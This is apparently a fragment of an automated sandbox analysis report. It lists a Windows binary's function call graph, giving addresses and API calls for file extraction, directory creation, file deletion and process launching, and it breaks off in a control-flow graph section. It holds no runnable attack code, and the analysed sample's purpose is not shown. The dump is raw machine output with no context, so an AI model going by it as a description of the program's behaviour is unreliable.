7ff7c018353c 47 API calls 22036->22336 22040 7ff7c01a2a98 22037->22040 22038->21994 22039->21994 22042 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22040->22042 22041->21994 22044 7ff7c01a2a9e 22042->22044 22043->21994 22049 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22044->22049 22045 7ff7c01812bc 33 API calls 22045->22059 22047->21994 22049->22026 22051 7ff7c0181b70 31 API calls 22051->22059 22052->21994 22053->21994 22054->21994 22056->21994 22058->21994 22059->22023 22059->22035 22059->22040 22059->22044 22059->22045 22059->22051 22061 7ff7c018d124 33 API calls 22059->22061 22060->21994 22061->22059 22063 7ff7c01a16c0 22062->22063 22064 7ff7c01a16a5 MoveFileExW 22062->22064 22063->21994 22065 7ff7c0181b70 31 API calls 22063->22065 22064->22063 22065->22063 22066->21994 22069 7ff7c01a34dd 22068->22069 22070 7ff7c0181c80 33 API calls 22069->22070 22071 7ff7c01a34f3 22070->22071 22072 7ff7c01a3528 22071->22072 22073 7ff7c0181c80 33 API calls 22071->22073 22349 7ff7c0199a70 22072->22349 22073->22072 22077 7ff7c019c12c 4 API calls 22076->22077 22078 7ff7c01a2f0f 22077->22078 22079 7ff7c01a3007 22078->22079 22080 7ff7c01a2f17 GetWindow 22078->22080 22081 7ff7c01a5c30 _handle_error 8 API calls 22079->22081 22085 7ff7c01a2f32 22080->22085 22082 7ff7c019f9eb 22081->22082 22082->21508 22082->21509 22083 7ff7c01a2f3e GetClassNameW 22701 7ff7c0190aa0 CompareStringW 22083->22701 22085->22079 22085->22083 22086 7ff7c01a2fe6 GetWindow 22085->22086 22087 7ff7c01a2f67 GetWindowLongPtrW 22085->22087 22086->22079 22086->22085 22087->22086 22088 7ff7c01a2f79 IsDlgButtonChecked 22087->22088 22088->22086 22089 7ff7c01a2f95 GetObjectW 22088->22089 22702 7ff7c019c194 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 22089->22702 22091 7ff7c01a2fb1 22092 7ff7c019c15c 4 API calls 22091->22092 22703 7ff7c019ca30 16 API calls _handle_error 22091->22703 22092->22091 22094 7ff7c01a2fc9 IsDlgButtonChecked DeleteObject 22094->22086 22096 7ff7c018212a SetDlgItemTextW 22095->22096 22097 7ff7c0182127 22095->22097 22097->22096 22098->21535 22100 7ff7c0182116 SetDlgItemTextW 22099->22100 22101 7ff7c0182113 22099->22101 22101->22100 22102->21559 22103->21606 22105 7ff7c0185890 51 API calls 22104->22105 22106 7ff7c0185885 22105->22106 22106->21607 22106->21633 22107->21607 22108->21688 22109->21723 22110->21734 22111->21743 22112->21748 22113->21754 22115 7ff7c01a6df0 22114->22115 22115->21759 22117 7ff7c0186e7c 22116->22117 22118 7ff7c0186ed6 22117->22118 22119 7ff7c0186e95 22117->22119 22704 7ff7c0181bd4 33 API calls std::_Xinvalid_argument 22118->22704 22121 7ff7c0187050 4 API calls 22119->22121 22123 7ff7c0186ec3 22121->22123 22124 7ff7c0181170 33 API calls BuildCatchObjectHelperInternal 22123->22124 22124->21691 22125->21716 22127->21646 22129 7ff7c0188e49 22128->22129 22131 7ff7c0188e32 22128->22131 22705 7ff7c0183550 33 API calls 22129->22705 22131->21722 22132->21773 22133->21807 22134->21820 22135->21834 22137 7ff7c01861e8 swprintf 46 API calls 22136->22137 22138 7ff7c018a909 22137->22138 22139 7ff7c0190688 WideCharToMultiByte 22138->22139 22140 7ff7c018a919 22139->22140 22141 7ff7c018a989 22140->22141 22152 7ff7c0189c00 31 API calls 22140->22152 22159 7ff7c018a96a SetDlgItemTextW 22140->22159 22161 7ff7c0189808 22141->22161 22144 7ff7c018aaf2 GetSystemMetrics GetWindow 22146 7ff7c018ac21 22144->22146 22153 7ff7c018ab1d 22144->22153 22145 7ff7c018aa03 22147 7ff7c018aac2 22145->22147 22148 7ff7c018aa0c GetWindowLongPtrW 22145->22148 22149 7ff7c01a5c30 _handle_error 8 API calls 22146->22149 22176 7ff7c01899a8 22147->22176 22150 7ff7c01ef270 22148->22150 22154 7ff7c018ac30 22149->22154 22155 7ff7c018aaaa GetWindowRect 22150->22155 22152->22140 22153->22146 22157 7ff7c018ab3e GetWindowRect 22153->22157 22160 7ff7c018ac00 GetWindow 22153->22160 22154->21847 22155->22147 22157->22153 22158 7ff7c018aae5 SetDlgItemTextW 22158->22144 22159->22140 22160->22146 22160->22153 22162 7ff7c01899a8 47 API calls 22161->22162 22164 7ff7c018984f 22162->22164 22163 7ff7c01a5c30 _handle_error 8 API calls 22165 7ff7c018998e GetWindowRect GetClientRect 22163->22165 22166 7ff7c01812bc 33 API calls 22164->22166 22175 7ff7c018995a 22164->22175 22165->22144 22165->22145 22167 7ff7c018989c 22166->22167 22168 7ff7c01899a1 22167->22168 22170 7ff7c01812bc 33 API calls 22167->22170 22169 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22168->22169 22171 7ff7c01899a7 22169->22171 22172 7ff7c0189914 22170->22172 22173 7ff7c018999c 22172->22173 22172->22175 22174 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22173->22174 22174->22168 22175->22163 22177 7ff7c01861e8 swprintf 46 API calls 22176->22177 22178 7ff7c01899eb 22177->22178 22179 7ff7c0190688 WideCharToMultiByte 22178->22179 22180 7ff7c0189a03 22179->22180 22181 7ff7c0189c00 31 API calls 22180->22181 22182 7ff7c0189a1b 22181->22182 22183 7ff7c01a5c30 _handle_error 8 API calls 22182->22183 22184 7ff7c0189a2b 22183->22184 22184->22144 22184->22158 22186 7ff7c01813c4 33 API calls 22185->22186 22187 7ff7c0182062 GetWindowTextW 22186->22187 22188 7ff7c0182094 22187->22188 22189 7ff7c01812bc 33 API calls 22188->22189 22190 7ff7c01820a2 22189->22190 22191 7ff7c01820dd 22190->22191 22193 7ff7c0182105 22190->22193 22192 7ff7c01a5c30 _handle_error 8 API calls 22191->22192 22194 7ff7c01820f3 22192->22194 22195 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22193->22195 22194->21856 22196 7ff7c018210a 22195->22196 22198 7ff7c019e9d0 GetDlgItem 22197->22198 22199 7ff7c019e98c GetMessageW 22197->22199 22198->21868 22198->21869 22200 7ff7c019e9ba TranslateMessage DispatchMessageW 22199->22200 22201 7ff7c019e9ab IsDialogMessageW 22199->22201 22200->22198 22201->22198 22201->22200 22204 7ff7c0185c8f 22202->22204 22203 7ff7c0185cbc 22205 7ff7c0185890 51 API calls 22203->22205 22204->22203 22206 7ff7c0185ca8 CreateDirectoryW 22204->22206 22207 7ff7c0185cca 22205->22207 22206->22203 22208 7ff7c0185d59 22206->22208 22209 7ff7c0185d6d GetLastError 22207->22209 22211 7ff7c01880b0 49 API calls 22207->22211 22210 7ff7c0185d69 22208->22210 22222 7ff7c0185ff4 22208->22222 22209->22210 22213 7ff7c01a5c30 _handle_error 8 API calls 22210->22213 22214 7ff7c0185cf8 22211->22214 22215 7ff7c0185d95 22213->22215 22216 7ff7c0185cfc CreateDirectoryW 22214->22216 22217 7ff7c0185d17 22214->22217 22215->21880 22216->22217 22218 7ff7c0185d50 22217->22218 22219 7ff7c0185daa 22217->22219 22218->22208 22218->22209 22220 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22219->22220 22221 7ff7c0185daf 22220->22221 22223 7ff7c018601e SetFileAttributesW 22222->22223 22224 7ff7c018601b 22222->22224 22225 7ff7c0186034 22223->22225 22232 7ff7c01860b5 22223->22232 22224->22223 22226 7ff7c01880b0 49 API calls 22225->22226 22228 7ff7c0186059 22226->22228 22227 7ff7c01a5c30 _handle_error 8 API calls 22229 7ff7c01860ca 22227->22229 22230 7ff7c018605d SetFileAttributesW 22228->22230 22231 7ff7c018607c 22228->22231 22229->22210 22230->22231 22231->22232 22233 7ff7c01860da 22231->22233 22232->22227 22234 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22233->22234 22235 7ff7c01860df 22234->22235 22237 7ff7c01861da 22236->22237 22238 7ff7c018610f 22236->22238 22244 7ff7c018353c 47 API calls 22237->22244 22242 7ff7c018611f BuildCatchObjectHelperInternal 22238->22242 22243 7ff7c0185004 33 API calls 2 library calls 22238->22243 22242->21900 22243->22242 22246 7ff7c019e57f 22245->22246 22247 7ff7c019e586 22245->22247 22246->21994 22247->22246 22341 7ff7c0181734 33 API calls 4 library calls 22247->22341 22249->21994 22251 7ff7c01a33cd 22250->22251 22256 7ff7c01a3079 memcpy_s 22250->22256 22252 7ff7c0181b70 31 API calls 22251->22252 22253 7ff7c01a33ec 22252->22253 22254 7ff7c01a5c30 _handle_error 8 API calls 22253->22254 22255 7ff7c01a33f8 22254->22255 22255->21980 22257 7ff7c01a31d4 22256->22257 22342 7ff7c0190aa0 CompareStringW 22256->22342 22259 7ff7c01812bc 33 API calls 22257->22259 22260 7ff7c01a3210 22259->22260 22261 7ff7c018587c 51 API calls 22260->22261 22262 7ff7c01a321a 22261->22262 22263 7ff7c0181b70 31 API calls 22262->22263 22264 7ff7c01a3225 22263->22264 22265 7ff7c01a3292 ShellExecuteExW 22264->22265 22268 7ff7c01812bc 33 API calls 22264->22268 22266 7ff7c01a32a5 22265->22266 22267 7ff7c01a3396 22265->22267 22269 7ff7c01a32c4 IsWindowVisible 22266->22269 22270 7ff7c01a32de WaitForInputIdle 22266->22270 22274 7ff7c01a3333 CloseHandle 22266->22274 22267->22251 22272 7ff7c01a344b 22267->22272 22273 7ff7c01a3267 22268->22273 22269->22270 22275 7ff7c01a32d1 ShowWindow 22269->22275 22271 7ff7c01a3928 5 API calls 22270->22271 22276 7ff7c01a32f6 22271->22276 22277 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22272->22277 22343 7ff7c01872ac 53 API calls 2 library calls 22273->22343 22279 7ff7c01a3342 22274->22279 22280 7ff7c01a3351 22274->22280 22275->22270 22276->22274 22284 7ff7c01a3304 GetExitCodeProcess 22276->22284 22281 7ff7c01a3450 22277->22281 22344 7ff7c0190aa0 CompareStringW 22279->22344 22280->22267 22288 7ff7c01a3387 ShowWindow 22280->22288 22282 7ff7c01a3275 22285 7ff7c0181b70 31 API calls 22282->22285 22284->22274 22286 7ff7c01a3317 22284->22286 22287 7ff7c01a327f 22285->22287 22286->22274 22287->22265 22288->22267 22289->21994 22290->21994 22291->21994 22292->21994 22293->21994 22294->21994 22295->22000 22296->21994 22297->21994 22298->21994 22300 7ff7c018887a 22299->22300 22345 7ff7c018367c 22300->22345 22303->22031 22305 7ff7c01857bb DeleteFileW 22304->22305 22306 7ff7c01857b8 22304->22306 22307 7ff7c01857d1 22305->22307 22315 7ff7c0185850 22305->22315 22306->22305 22309 7ff7c01880b0 49 API calls 22307->22309 22308 7ff7c01a5c30 _handle_error 8 API calls 22310 7ff7c0185865 22308->22310 22311 7ff7c01857f6 22309->22311 22310->21994 22312 7ff7c01857fa DeleteFileW 22311->22312 22313 7ff7c0185817 22311->22313 22312->22313 22314 7ff7c0185875 22313->22314 22313->22315 22316 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22314->22316 22315->22308 22317 7ff7c018587a 22316->22317 22318->21994 22320->21994 22321->21994 22322->21994 22323->21994 22324->21994 22325->21994 22327 7ff7c018d156 22326->22327 22328 7ff7c018d18a 22327->22328 22329 7ff7c0181734 33 API calls 22327->22329 22328->22059 22329->22327 22330->21954 22341->22247 22342->22257 22343->22282 22344->22280 22347 7ff7c01836c6 memcpy_s 22345->22347 22346 7ff7c01a5c30 _handle_error 8 API calls 22348 7ff7c018378a 22346->22348 22347->22346 22348->21994 22350 7ff7c0199a80 memcpy_s _snwprintf 22349->22350 22367 7ff7c018bb9c 22350->22367 22352 7ff7c0199b1e memcpy_s 22370 7ff7c0199518 22352->22370 22356 7ff7c0199b88 22357 7ff7c0199bcb 22356->22357 22360 7ff7c0199cf4 22356->22360 22381 7ff7c0199cfc 22357->22381 22361 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22360->22361 22363 7ff7c0199cf9 22361->22363 22364 7ff7c01a5c30 _handle_error 8 API calls 22365 7ff7c0199cde 22364->22365 22365->21746 22366 7ff7c0199bd9 22366->22364 22368 7ff7c01813c4 33 API calls 22367->22368 22369 7ff7c018bbc1 22368->22369 22369->22352 22371 7ff7c019959f BuildCatchObjectHelperInternal 22370->22371 22372 7ff7c0181b70 31 API calls 22371->22372 22373 7ff7c01997d0 BuildCatchObjectHelperInternal 22371->22373 22372->22373 22374 7ff7c019986f 22373->22374 22409 7ff7c0197fa8 33 API calls 22373->22409 22376 7ff7c018bbf8 22374->22376 22377 7ff7c018bc06 shared_ptr 22376->22377 22378 7ff7c018bc39 22377->22378 22379 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22377->22379 22378->22356 22380 7ff7c018bc5a 22379->22380 22382 7ff7c0199d0a 22381->22382 22383 7ff7c0199bd5 22382->22383 22410 7ff7c0183c7c 82 API calls 22382->22410 22383->22366 22385 7ff7c0196d28 22383->22385 22411 7ff7c01976f8 22385->22411 22390 7ff7c01a5c30 _handle_error 8 API calls 22392 7ff7c0196fa2 22390->22392 22391 7ff7c0182314 33 API calls 22393 7ff7c0196d85 22391->22393 22392->22366 22393->22391 22396 7ff7c0196fc4 22393->22396 22398 7ff7c0196ea0 22393->22398 22400 7ff7c0196fbf 22393->22400 22408 7ff7c0196f52 22393->22408 22440 7ff7c0191dd0 22393->22440 22451 7ff7c0186288 22393->22451 22402 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22396->22402 22397 7ff7c0196f1f 22458 7ff7c019524c 22397->22458 22398->22396 22398->22397 22398->22400 22403 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22400->22403 22401 7ff7c0196f37 22405 7ff7c0196f43 22401->22405 22406 7ff7c0196f54 22401->22406 22404 7ff7c0196fca 22402->22404 22403->22396 22465 7ff7c01839e0 82 API calls 22405->22465 22406->22408 22466 7ff7c0183ca0 100 API calls 22406->22466 22408->22390 22409->22374 22410->22383 22412 7ff7c0186288 55 API calls 22411->22412 22413 7ff7c0197760 22412->22413 22418 7ff7c019777b 22413->22418 22467 7ff7c0194e68 22413->22467 22417 7ff7c01979a6 22419 7ff7c01a5c30 _handle_error 8 API calls 22417->22419 22418->22417 22421 7ff7c01979db 22418->22421 22422 7ff7c0196d5a 22419->22422 22423 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22421->22423 22422->22393 22422->22406 22464 7ff7c01839e0 82 API calls 22422->22464 22425 7ff7c01979e0 22423->22425 22430 7ff7c019524c 103 API calls 22431 7ff7c019787a 22430->22431 22431->22418 22518 7ff7c019502c 22431->22518 22434 7ff7c019524c 103 API calls 22435 7ff7c01978e1 22434->22435 22435->22418 22436 7ff7c019502c 120 API calls 22435->22436 22437 7ff7c01978c0 22436->22437 22437->22418 22524 7ff7c01839e0 82 API calls 22437->22524 22441 7ff7c0191bf4 64 API calls 22440->22441 22442 7ff7c0191df9 22441->22442 22443 7ff7c01861e8 swprintf 46 API calls 22442->22443 22444 7ff7c0191e2a 22443->22444 22445 7ff7c01812bc 33 API calls 22444->22445 22446 7ff7c0191e55 22445->22446 22447 7ff7c0188d18 47 API calls 22446->22447 22448 7ff7c0191e62 22447->22448 22449 7ff7c01a5c30 _handle_error 8 API calls 22448->22449 22450 7ff7c0191e72 22449->22450 22450->22393 22452 7ff7c018885c 8 API calls 22451->22452 22453 7ff7c01862a1 22452->22453 22454 7ff7c01862cf 22453->22454 22675 7ff7c018647c 22453->22675 22454->22393 22457 7ff7c01862ba FindClose 22457->22454 22459 7ff7c019528a 22458->22459 22461 7ff7c0195280 22458->22461 22459->22461 22462 7ff7c0184c40 101 API calls 22459->22462 22460 7ff7c01952ae 22463 7ff7c0184d50 101 API calls 22460->22463 22461->22401 22462->22460 22463->22461 22464->22393 22465->22408 22468 7ff7c01a5ae0 4 API calls 22467->22468 22469 7ff7c0194e76 22468->22469 22473 7ff7c01846a0 54 API calls 22469->22473 22470 7ff7c0194ebd 22471 7ff7c0194ed4 22470->22471 22525 7ff7c0183cd0 100 API calls 2 library calls 22470->22525 22471->22418 22474 7ff7c0199db0 22471->22474 22473->22470 22482 7ff7c0184c40 101 API calls 22474->22482 22475 7ff7c0199de5 22483 7ff7c0184a70 104 API calls 22475->22483 22476 7ff7c0199e51 22478 7ff7c01a5c30 _handle_error 8 API calls 22476->22478 22477 7ff7c0199e00 22477->22476 22484 7ff7c0184c40 101 API calls 22477->22484 22479 7ff7c019778f 22478->22479 22485 7ff7c01845f0 22479->22485 22480 7ff7c0199e36 22481 7ff7c0184a70 104 API calls 22480->22481 22481->22476 22482->22475 22483->22477 22484->22480 22490 7ff7c0184d50 101 API calls 22485->22490 22486 7ff7c018460f 22491 7ff7c0184c40 101 API calls 22486->22491 22487 7ff7c0184628 22492 7ff7c0184d50 101 API calls 22487->22492 22488 7ff7c0184638 22493 7ff7c0184c40 101 API calls 22488->22493 22489 7ff7c0184651 22494 7ff7c01971b4 22489->22494 22490->22486 22491->22487 22492->22488 22493->22489 22495 7ff7c01971f6 22494->22495 22496 7ff7c019728a 22494->22496 22497 7ff7c01953bc 120 API calls 22495->22497 22507 7ff7c01972f6 22496->22507 22510 7ff7c0184c40 101 API calls 22496->22510 22505 7ff7c0197221 22497->22505 22498 7ff7c01972cd 22511 7ff7c0184d50 101 API calls 22498->22511 22499 7ff7c0197453 22503 7ff7c01a5c30 _handle_error 8 API calls 22499->22503 22500 7ff7c01972e1 22526 7ff7c01953bc 22500->22526 22501 7ff7c019502c 120 API calls 22508 7ff7c019748e 22501->22508 22506 7ff7c019754c 22503->22506 22504 7ff7c01953bc 120 API calls 22504->22507 22505->22499 22505->22501 22506->22418 22512 7ff7c0197f5c 22506->22512 22507->22499 22507->22504 22507->22505 22508->22499 22554 7ff7c0196fcc 22508->22554 22510->22498 22511->22500 22513 7ff7c0197f70 22512->22513 22517 7ff7c01977e7 22512->22517 22513->22517 22644 7ff7c0194a98 22513->22644 22517->22418 22517->22430 22519 7ff7c01950f8 22518->22519 22521 7ff7c0195054 BuildCatchObjectHelperInternal 22518->22521 22519->22434 22519->22437 22520 7ff7c01953bc 120 API calls 22520->22521 22521->22519 22521->22520 22522 7ff7c01950de 22521->22522 22674 7ff7c0183dc4 99 API calls 22522->22674 22524->22418 22525->22471 22553 7ff7c0184a70 104 API calls 22526->22553 22527 7ff7c01a5c30 _handle_error 8 API calls 22528 7ff7c0195673 22527->22528 22528->22507 22529 7ff7c0195408 22530 7ff7c0186288 55 API calls 22529->22530 22552 7ff7c0195621 22529->22552 22531 7ff7c0195483 22530->22531 22532 7ff7c0195501 22531->22532 22533 7ff7c01954ab 22531->22533 22534 7ff7c01954ff 22532->22534 22535 7ff7c0191dd0 64 API calls 22532->22535 22533->22534 22561 7ff7c0191bf4 22533->22561 22537 7ff7c0194e68 107 API calls 22534->22537 22535->22534 22540 7ff7c019553b 22537->22540 22542 7ff7c01812bc 33 API calls 22540->22542 22551 7ff7c019558f 22540->22551 22545 7ff7c019557b 22542->22545 22544 7ff7c019568f 22546 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22544->22546 22608 7ff7c0190114 22545->22608 22548 7ff7c0195694 22546->22548 22549 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22548->22549 22550 7ff7c019569a 22549->22550 22551->22544 22551->22548 22551->22552 22552->22527 22553->22529 22640 7ff7c0197cc8 22554->22640 22557 7ff7c019502c 120 API calls 22560 7ff7c019703b 22557->22560 22558 7ff7c01a5c30 _handle_error 8 API calls 22559 7ff7c0197193 22558->22559 22559->22499 22560->22558 22624 7ff7c0187af8 47 API calls 22561->22624 22563 7ff7c0191c2e 22564 7ff7c01812bc 33 API calls 22563->22564 22565 7ff7c0191c5a 22564->22565 22625 7ff7c0190aa0 CompareStringW 22565->22625 22567 7ff7c0191c82 22568 7ff7c01812bc 33 API calls 22567->22568 22571 7ff7c0191cdc 22567->22571 22609 7ff7c01a3bf8 22608->22609 22610 7ff7c0188b28 47 API calls 22609->22610 22624->22563 22625->22567 22642 7ff7c0197d1d BuildCatchObjectHelperInternal 22640->22642 22641 7ff7c019700f 22641->22557 22641->22560 22642->22641 22643 7ff7c0184c40 101 API calls 22642->22643 22643->22642 22645 7ff7c0194ad2 22644->22645 22667 7ff7c0194acb 22644->22667 22647 7ff7c0194b58 22645->22647 22653 7ff7c0194adf 22645->22653 22669 7ff7c0194b10 22645->22669 22646 7ff7c01a5c30 _handle_error 8 API calls 22649 7ff7c0194d55 22646->22649 22671 7ff7c0194710 33 API calls memcpy_s 22647->22671 22648 7ff7c019524c 103 API calls 22648->22667 22649->22517 22670 7ff7c0183834 82 API calls 2 library calls 22649->22670 22651 7ff7c0194b99 22652 7ff7c019502c 120 API calls 22651->22652 22660 7ff7c0194bb0 22652->22660 22654 7ff7c0194b34 22653->22654 22653->22667 22653->22669 22655 7ff7c019502c 120 API calls 22654->22655 22655->22667 22656 7ff7c0194c44 22672 7ff7c019a1a0 34 API calls 22656->22672 22657 7ff7c0194d6d 22658 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22657->22658 22661 7ff7c0194d72 22658->22661 22660->22656 22662 7ff7c0194c56 22660->22662 22666 7ff7c0194bb4 22660->22666 22673 7ff7c018cd00 49 API calls 2 library calls 22662->22673 22663 7ff7c0194c54 22664 7ff7c0188e0c 33 API calls 22663->22664 22666->22657 22666->22667 22667->22646 22669->22648 22670->22517 22671->22651 22673->22663 22674->22519 22676 7ff7c01864b9 FindFirstFileW 22675->22676 22677 7ff7c0186592 FindNextFileW 22675->22677 22680 7ff7c01864de 22676->22680 22681 7ff7c01865b3 22676->22681 22679 7ff7c01865a1 GetLastError 22677->22679 22677->22681 22700 7ff7c0186580 22679->22700 22683 7ff7c01880b0 49 API calls 22680->22683 22682 7ff7c01865d1 22681->22682 22685 7ff7c0181c80 33 API calls 22681->22685 22690 7ff7c01812bc 33 API calls 22682->22690 22684 7ff7c0186504 22683->22684 22687 7ff7c0186508 FindFirstFileW 22684->22687 22688 7ff7c0186527 22684->22688 22685->22682 22686 7ff7c01a5c30 _handle_error 8 API calls 22689 7ff7c01862b4 22686->22689 22687->22688 22688->22681 22692 7ff7c018656f GetLastError 22688->22692 22695 7ff7c01866d4 22688->22695 22689->22454 22689->22457 22691 7ff7c01865fb 22690->22691 22693 7ff7c0188dc4 47 API calls 22691->22693 22692->22700 22694 7ff7c0186609 22693->22694 22698 7ff7c01866cf 22694->22698 22694->22700 22696 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22695->22696 22697 7ff7c01866da 22696->22697 22699 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22698->22699 22699->22695 22700->22686 22701->22085 22702->22091 22703->22094 22705->22131 22932 7ff7c01a4976 14 API calls _com_raise_error 22933 7ff7c01947f0 22934 7ff7c0188e0c 33 API calls 22933->22934 22935 7ff7c0194835 22934->22935 22936 7ff7c0186288 55 API calls 22935->22936 22937 7ff7c0194866 22936->22937 22938 7ff7c0194909 22937->22938 22940 7ff7c0194936 22937->22940 22941 7ff7c0194931 22937->22941 22939 7ff7c01a5c30 _handle_error 8 API calls 22938->22939 22942 7ff7c019491c 22939->22942 22943 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22940->22943 22944 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22941->22944 22945 7ff7c019493c 22943->22945 22944->22940 22990 7ff7c01832f0 22991 7ff7c0183327 22990->22991 22995 7ff7c01833c3 22991->22995 22998 7ff7c018335b 22991->22998 22999 7ff7c01833ee 22991->22999 23003 7ff7c0186858 22991->23003 23026 7ff7c018dacc 22991->23026 22992 7ff7c01a5c30 _handle_error 8 API calls 22993 7ff7c01833dd 22992->22993 22996 7ff7c0181b70 31 API calls 22995->22996 22996->22998 22998->22992 23000 7ff7c01833ff 22999->23000 23030 7ff7c018d9b4 CompareStringW 22999->23030 23000->22995 23002 7ff7c0181c80 33 API calls 23000->23002 23002->22995 23006 7ff7c0186898 23003->23006 23004 7ff7c0186962 23031 7ff7c0186ae8 23004->23031 23006->23004 23012 7ff7c01868d6 __vcrt_InitializeCriticalSectionEx 23006->23012 23038 7ff7c0190ad0 CompareStringW 23006->23038 23007 7ff7c01a5c30 _handle_error 8 API calls 23009 7ff7c0186ac7 23007->23009 23009->22991 23010 7ff7c0186a85 23013 7ff7c01868fd 23010->23013 23041 7ff7c018d9d0 CompareStringW 23010->23041 23012->23013 23015 7ff7c0186946 __vcrt_InitializeCriticalSectionEx 23012->23015 23039 7ff7c0190ad0 CompareStringW 23012->23039 23013->23007 23015->23004 23015->23013 23016 7ff7c01869fd 23015->23016 23017 7ff7c01812bc 33 API calls 23015->23017 23020 7ff7c0186a6a __vcrt_InitializeCriticalSectionEx 23015->23020 23019 7ff7c0186adf 23016->23019 23021 7ff7c0186a4d 23016->23021 23018 7ff7c01869ea 23017->23018 23022 7ff7c018885c 8 API calls 23018->23022 23023 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 23019->23023 23020->23004 23020->23010 23020->23013 23021->23013 23021->23020 23040 7ff7c0190ad0 CompareStringW 23021->23040 23022->23016 23025 7ff7c0186ae4 23023->23025 23028 7ff7c018dadf 23026->23028 23027 7ff7c018dafd 23027->22991 23028->23027 23029 7ff7c0181c80 33 API calls 23028->23029 23029->23027 23030->23000 23034 7ff7c0186b14 23031->23034 23032 7ff7c0186c1d 23033 7ff7c0186ae8 CompareStringW 23032->23033 23036 7ff7c0186bc1 23032->23036 23033->23032 23034->23032 23035 7ff7c0186c02 23034->23035 23034->23036 23035->23036 23042 7ff7c018d9d0 CompareStringW 23035->23042 23036->23013 23038->23012 23039->23015 23040->23020 23041->23013 23042->23036

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 7ff7c018dc4c-7ff7c018dcb0 call 7ff7c01813c4 GetSystemDirectoryW 3 7ff7c018dcb2-7ff7c018dcb4 0->3 4 7ff7c018dcb9-7ff7c018dd34 call 7ff7c01aaf0c call 7ff7c01812bc call 7ff7c01aaf0c call 7ff7c01812bc call 7ff7c01888f8 0->4 5 7ff7c018de19-7ff7c018de20 3->5 31 7ff7c018dd36-7ff7c018dd48 4->31 32 7ff7c018dd68-7ff7c018dd81 4->32 7 7ff7c018de51-7ff7c018de78 call 7ff7c01a5c30 5->7 8 7ff7c018de22-7ff7c018de35 5->8 10 7ff7c018de37-7ff7c018de4a 8->10 11 7ff7c018de4c call 7ff7c01a5b1c 8->11 10->11 14 7ff7c018de79-7ff7c018de7e call 7ff7c01aae94 10->14 11->7 23 7ff7c018de7f-7ff7c018de84 call 7ff7c01aae94 14->23 28 7ff7c018de85-7ff7c018de8a call 7ff7c01aae94 23->28 38 7ff7c018de8b-7ff7c018dee8 call 7ff7c01aae94 call 7ff7c01a5c90 GetModuleHandleW 28->38 34 7ff7c018dd63 call 7ff7c01a5b1c 31->34 35 7ff7c018dd4a-7ff7c018dd5d 31->35 36 7ff7c018dd83-7ff7c018dd95 32->36 37 7ff7c018ddb5-7ff7c018ddd4 LoadLibraryW 32->37 34->32 35->23 35->34 40 7ff7c018ddb0 call 7ff7c01a5b1c 36->40 41 7ff7c018dd97-7ff7c018ddaa 36->41 42 7ff7c018ddd6-7ff7c018dde8 37->42 43 7ff7c018de08-7ff7c018de15 37->43 53 7ff7c018df3f-7ff7c018e269 38->53 54 7ff7c018deea-7ff7c018defd GetProcAddress 38->54 40->37 41->28 41->40 46 7ff7c018de03 call 7ff7c01a5b1c 42->46 47 7ff7c018ddea-7ff7c018ddfd 42->47 43->5 46->43 47->38 47->46 55 7ff7c018e26f-7ff7c018e278 call 7ff7c01aec3c 53->55 56 7ff7c018e3c7-7ff7c018e3e5 call 7ff7c0187c10 call 7ff7c0188b28 53->56 57 7ff7c018deff-7ff7c018df0e 54->57 58 7ff7c018df17-7ff7c018df2a GetProcAddress 54->58 55->56 65 7ff7c018e27e-7ff7c018e2c1 call 7ff7c0187c10 CreateFileW 55->65 69 7ff7c018e3e9-7ff7c018e3f3 call 7ff7c0186768 56->69 57->58 58->53 61 7ff7c018df2c-7ff7c018df3c 58->61 61->53 72 7ff7c018e3b4-7ff7c018e3c2 CloseHandle call 7ff7c0181b70 65->72 73 7ff7c018e2c7-7ff7c018e2da SetFilePointer 65->73 77 7ff7c018e3f5-7ff7c018e400 call 7ff7c018dc4c 69->77 78 7ff7c018e428-7ff7c018e470 call 7ff7c01aaf0c call 7ff7c01812bc call 7ff7c0188dc4 call 7ff7c0181b70 call 7ff7c0185890 69->78 72->56 73->72 75 7ff7c018e2e0-7ff7c018e302 ReadFile 73->75 75->72 79 7ff7c018e308-7ff7c018e316 75->79 77->78 89 7ff7c018e402-7ff7c018e426 CompareStringW 77->89 123 7ff7c018e475-7ff7c018e478 78->123 82 7ff7c018e6c4-7ff7c018e6dc call 7ff7c01a5df4 call 7ff7c0190100 call 7ff7c0190108 79->82 83 7ff7c018e31c-7ff7c018e370 call 7ff7c01aaf0c call 7ff7c01812bc 79->83 118 7ff7c018e6ef-7ff7c018e6f6 82->118 119 7ff7c018e6de-7ff7c018e6ea call 7ff7c0183b84 82->119 100 7ff7c018e387-7ff7c018e39d call 7ff7c018cf98 83->100 89->78 93 7ff7c018e481-7ff7c018e48a 89->93 93->69 97 7ff7c018e490 93->97 102 7ff7c018e495-7ff7c018e498 97->102 116 7ff7c018e39f-7ff7c018e3af call 7ff7c0181b70 * 2 100->116 117 7ff7c018e372-7ff7c018e382 call 7ff7c018dc4c 100->117 106 7ff7c018e503-7ff7c018e506 102->106 107 